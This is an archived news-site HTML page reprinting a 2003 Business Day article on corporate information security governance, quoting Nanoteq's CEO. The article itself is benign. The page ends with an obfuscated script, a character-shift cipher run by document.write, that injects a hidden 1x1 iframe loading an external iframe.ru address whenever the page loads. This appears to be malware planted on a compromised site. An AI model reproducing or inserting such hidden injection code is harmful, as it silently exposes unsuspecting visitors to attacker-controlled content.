[an error occurred while processing this directive]
     <p align=left><font face=arial><big><b>CurzTech News Network</b></big>
      <hr>
      <small><a href="http://curztech.com/news/">CurzTech&nbsp;News&nbsp;Network</a> |&nbsp;<a href="http://curztech.com/news/worldnews.shtml">CurzTech&nbsp;World&nbsp;News</a> |&nbsp;<a href="http://curztech.com/news/usnews.shtml">CurzTech&nbsp;U.S.&nbsp;News</a> |&nbsp;<a href="http://curztech.com/news/entertainment.shtml">CurzTech&nbsp;Entertainment&nbsp;News</a> |&nbsp;<a href="http://curztech.com/news/politics.shtml">CurzTech&nbsp;Political&nbsp;News</a> |&nbsp;<a href="http://curztech.com/news/conspiracy.shtml">CurzTech&nbsp;Conspiracy&nbsp;News</a> |&nbsp;<a href="http://curztech.com/news/offsitenews_prev.shtml">Yesterday's News</a> |&nbsp;<a href="http://curztech.com/news/offsite_archive.shtml">Offsite Archive</a></small>
      <hr>
     </p>

<!-- Begin Content -->











<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>OSAC Item (Printer Friendly Version)</title>
</head>

<body>




<font CLASS="header"><strong>Ensuring Data Security is Vital</strong></font><BR>from Business Day 1st Edition on Wednesday, March 26, 2003
<P> Monitoring around the clock  <P>
PROTECTING information assets against security breaches in an increasingly hi-tech age is a prime challenge.  <P>
But information security cannot be viewed as the prerogative of a company's IT department. It needs to fall under the direct control of the company board as part of the business continuity and the risk management decision-making process, says Nelius Snyman, CEO of Nanoteq.  <P>
Snyman says the threat to information security in SA is very real.  <P>
"Often organisations only respond after they have experienced a breach of security and suffered damage to their information assets.  <P>
"The secret of good information security is to be proactive, to predefine your policies, procedures and standards, to put mechanisms in place to ensure that your data is secure and to monitor on a 24-hour basis."  <P>
Snyman estimates that at present about 70% of all threats to information security are internal, although external security threats from fraud syndicates for instance are on the increase.  <P>
The majority of SA companies do not comply with King 2 in terms of information securityrelated aspects, he says.  <P>
"Most organisations still regard these as an IT issue and delegate responsibility for information security to the IT department, which in some instances could compromise security."  <P>
Operational responsibility should be devolved to a chief security or information officer who has the authority and mandate to react to security issues quickly without needing to cut through miles of red tape, says Snyman.  <P>
Such an officer should report directly to the board, ideally to the CEO.  <P>
Nanoteq has developed an information assurance model to identify information assets and to prioritise those that could be at greatest risk, he says.  <P>
Procedures, policies and standards relating to information security within the company are examined, as well as the mechanisms in place to protect information.  <P>
Snyman says that as IT systems increasingly become more open and suppliers and clients are able to have access to a company's systems, it is essential that organisations put proper corporate governance procedures in place.  <P>
"If they fail to do so they won't be able to perform properly because their clients and partners will no longer trust them."  <P>
Copyright 2003 Business Day 1st Edition <P></A></B></I></U></H1></H2></H3></PRE></BIG></FONT></STRONG></BLINK></SMALL></OL></UL></QUOTE> 











<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script></body>
</html>

[an error occurred while processing this directive]